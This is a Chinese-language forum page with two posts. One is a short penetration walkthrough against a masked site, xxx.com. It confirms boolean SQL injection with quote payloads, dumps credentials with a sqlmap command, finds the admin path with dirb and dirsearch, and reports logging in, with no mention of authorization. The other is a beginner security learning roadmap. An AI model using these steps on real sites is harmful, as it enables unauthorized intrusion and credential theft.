公告

Gentoo交流群:838664909 欢迎您的加入

页次: 1

#1 网络方面问题 » 实战渗透 » 2023-10-14 22:35:20

snow
回复: 0

通过信息收集找到一个网站xxx.com,发现有一个地方有传入参数,测试一下是否有注入。
www.xxx.com/se?cid=3'   显示页面不正常
www.xxx.com/se?cid=3'--+  显示页面正常   存在布尔注入。

使用sqlmap工具注入。
sqlmap -u "url" -D 数据库名 -T 表名 -C 列名 --dump

得到账号密码后,进行目录扫描。
dirb url
dirsearch -u url
得到网站后台路径
https://www.xxx.com/system/main.php
成功登录后台。

#2 网络方面问题 » 新手怎么入门网络安全? » 2023-08-01 22:37:06

snow
回复: 0

计算机基础
计算机网络基础
前端三剑客基础
web安全

中级:
进阶内网安全
高级:
拓展木马免杀,逆向,安全开发等

页次: 1

页脚

Powered by FluxBB

本站由XREA提供空间支持